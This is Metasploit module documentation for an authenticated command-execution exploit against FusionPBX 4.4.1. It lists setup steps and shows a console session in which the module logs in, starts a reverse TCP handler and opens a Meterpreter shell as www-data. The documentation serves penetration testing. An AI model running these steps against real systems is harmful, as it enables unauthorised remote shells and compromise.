## Description

  This module uses administrative functionality available in FusionPBX
  to gain a shell.

  The Command section of the application permits users with `exec_view`
  permissions, or superadmin permissions, to execute arbitrary system
  commands, or arbitrary PHP code, as the web server user.


## Vulnerable Software

  This module has been tested successfully on FusionPBX version
  4.4.1 on Ubuntu 19.04 (x64).

  Software:

  * https://www.fusionpbx.com/download
  * https://github.com/fusionpbx/fusionpbx/releases


## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/unix/webapp/fusionpbx_exec_cmd_exec`
  3. Do: `set rhosts <IP>`
  4. Do: `set username <username>` (default: `admin`)
  5. Do: `set password <password>`
  6. Do: `run`
  7. You should get a new session


## Options

  **TARGETURI**

  The base path to FusionPBX (default: `/`)

  **USERNAME**

  The username for FusionPBX (default: `admin`)

  **PASSWORD**

  The password for FusionPBX


## Scenarios

  ```
  msf5 > use exploit/unix/webapp/fusionpbx_exec_cmd_exec 
  msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set rhosts 172.16.191.214
  rhosts => 172.16.191.214
  msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set username admin
  username => admin
  msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set password PXRtwZqSkvToC4gc
  password => PXRtwZqSkvToC4gc
  msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set lhost 172.16.191.165 
  lhost => 172.16.191.165
  msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > show targets

  Exploit targets:

     Id  Name
     --  ----
     0   Automatic (PHP In-Memory)
     1   Automatic (Unix In-Memory)
     2   Automatic (Linux Dropper)


  msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] Authenticated as user 'admin'
  [*] Sending payload (1115 bytes) ...
  [*] Sending stage (38288 bytes) to 172.16.191.214
  [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.214:60772) at 2019-11-01 19:25:43 -0400

  meterpreter > getuid
  Server username: www-data (33)
  meterpreter > 
  ```

